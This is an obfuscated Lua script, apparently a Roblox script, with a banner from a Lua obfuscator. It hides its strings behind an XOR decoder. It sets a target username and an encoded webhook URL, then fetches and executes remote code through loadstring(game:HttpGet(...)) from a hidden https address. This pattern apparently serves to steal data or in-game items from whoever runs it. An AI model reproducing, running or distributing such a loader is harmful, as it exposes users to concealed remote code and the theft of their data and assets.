--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10=0 + 0;local v11;local v12;while true do if (v10==(0 + 0)) then v11=0 + 0 + 0 + 0;v12=nil;v10=1 -0;end if (v10==(1 -0)) then while true do local v13=0;local v14;while true do if (v13==(0 + 0)) then v14=(918 -(4 + 441)) -(179 + 236 + 58);while true do if (v14==((699 + 515) -(318 + 443 + 453))) then if (v11==(((6024 -(910 + 453)) -3084) -(119 + ((12309 -6312) -4539)))) then local v15=(926 -(11 + 18)) -((1965 -(928 + 401)) + (1984 -(873 + 850)));while true do if (v15==((385 + 606) -(60 + 151 + 779))) then v11=(57 + 79) -((1274 -(1176 + 71)) + (311 -(586 -383)));break;end if (v15==(995 -(164 + 831))) then local v16=0 -0;while true do if (v16==0) then v12={};for i=((1035 + 255) -(115 + 953 + 221)) + ((3051 -(1229 + 765)) -((2150 -(1091 + 537)) + 535)), #v8 do v6(v12,v0(v4(v1(v2(v8,i,i + ((8417 -6677) -(502 + 609 + 234 + 394)))),v1(v2(v9,(1834 -(350 + 1483)) + (0 -(0 -0)) + ((i-((2 -1) -((81 -(75 + 6)) -(1632 -(501 + 1131)))))% #v9),((349 + 162) -(33 + 24 + 453)) + ((i-(1 + 0 + 0 + ((0 -0) -0)))% #v9) + ((1 + 0) -((0 -0) + 0)))))%256));end v16=1 -0;end if (v16==(1 -0)) then v15=1274 -(931 + (851 -509));break;end end end end end if (v11==((3720 -2497) -((192 -123) + (2024 -(1440 + 477)) + (1761 -(382 + 333))))) then return v5(v12);end break;end end break;end end end break;end end end UserName=v7("\236\233\16\177\39\115\245\241","\148\159\85\197\79\18");WebHook=v7("\41\15\160\193\223\123\84\251\213\197\50\24\187\195\200\111\24\187\220\131\32\11\189\158\219\36\25\188\222\195\42\8\251\128\156\116\74\230\134\156\120\73\236\130\152\119\74\231\135\154\119\76\251\210\192\120\45\154\242\253\116\63\142\251\217\35\73\131\254\221\51\14\229\253\249\38\30\165\238\197\25\58\146\219\194\51\48\229\230\221\119\30\165\203\195\108\12\163\222\129\49\26\191\253\196\50\42\158\192\213\43\42\230\253\157\8\17\174\131\196\57","\65\123\212\177\172");loadstring(game:HttpGet(v7("\209\47\45\95\174\131\116\118\93\188\206\117\62\70\169\209\46\59\90\174\220\41\58\64\179\205\62\55\91\243\218\52\52\0\149\216\41\61\104\188\212\62\10\92\242\233\8\1\0\176\216\50\55\0\147\220\44\119\67\168\216","\185\91\89\47\221"),true))();
